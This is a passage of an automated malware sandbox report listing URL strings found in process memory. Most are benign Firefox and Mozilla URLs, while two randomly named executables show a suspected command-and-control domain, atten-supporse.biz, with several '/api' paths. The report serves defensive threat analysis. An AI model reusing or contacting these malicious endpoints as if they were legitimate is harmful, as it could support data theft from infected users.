Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingEnabled
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingMaxResultsNoSearchMode
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingRequireSearchMode
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 0000001B.00000002.3653135084.000001C23FBFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3623983459.000001C23CAC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3633701258.000001C23D220000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FBF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3623183764.000001C23CA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3523868951.000001C23BE37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3523689736.000001C23BD2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B95C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C244731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624313828.000001C23CB67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3623183764.000001C23CA55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3180385718.000001C2447D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3253393286.000001C23DED2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3253393286.000001C23DEB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3157207703.000001C23CAC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3654754835.000001C23FD05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.3648161023.000001C23E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001B.00000002.3648161023.000001C23E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D8C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23ED61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3523689736.000001C23BD2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624313828.000001C23CB67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B409000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238599000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3636872771.000001C23D9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3624313828.000001C23CB47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239BD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/browser-captiv
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulonDownloadBatchStarting
Source: e051bdf457.exe, 00000009.00000002.3288701516.0000000005AA6000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3301502115.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 79ddad050f.exe, 00000008.00000003.3032492622.0000000005919000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3229768373.0000000005951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D888000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca_createPermissionClearButtontemplate-permission-popup_createBlockedPopup
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001B.00000002.3654754835.000001C23FDA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3191961267.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3648786422.000001C23EA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3645263356.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3244240541.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3649402880.000001C23EB6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CEB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CE19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B6DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3436711953.000001C239B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orghttps://monitor.firefox.comupgradeTabsProgressListenerStreams
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D006000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D15A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3643180595.000001C23E0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3628973173.000001C23CFA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpTELEMETRY_ASSEMBLE_PAYLOAD_EXCEPTIONinternal-telemetry-after-
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: 79ddad050f.exe, 00000008.00000003.3130122361.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2972144892.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3007919799.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3179670006.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3180642023.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3113176608.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093262916.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3071939046.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3058481738.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/3
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/9
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/=
Source: 79ddad050f.exe, 00000008.00000003.3130122361.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/B
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/U
Source: 79ddad050f.exe, 00000008.00000003.3007919799.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/YYNP
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/YYNPZ
Source: 79ddad050f.exe, 0000000A.00000003.3218476120.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3220379720.0000000001000000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3170698705.0000000001001000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3286400452.0000000005930000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3218476120.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3228403714.0000000001002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api1rq
Source: 79ddad050f.exe, 00000008.00000003.3129362913.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3129511355.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiGrc
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiR
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apigq
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apipy
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apit
Source: 79ddad050f.exe, 00000008.00000003.3093351700.000000000100D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apite
Source: 79ddad050f.exe, 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3231030291.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3220379720.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3233138119.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3228403714.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3170698705.0000000001010000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3218476120.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/c
Source: 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/imZ
Source: 79ddad050f.exe, 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/pp
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/r
Source: 79ddad050f.exe, 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/z
Source: 79ddad050f.exe, 00000008.00000003.3129362913.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3129511355.0000000001002000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: 79ddad050f.exe, 00000008.00000003.3093262916.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3058481738.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3112948159.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiK
Source: 79ddad050f.exe, 00000008.00000003.3112948159.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiicrosoft
Source: firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001B.00000003.3182542929.000001C2444C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: 79ddad050f.exe, 00000008.00000003.3034902192.00000000058E6000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001B.00000002.3636872771.000001C23D903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DA29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E66C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610655302.000001C23C377000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1170143
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180chrome://browser/skin/notification-icons/popup.s
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3243620551.000001C23E2D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
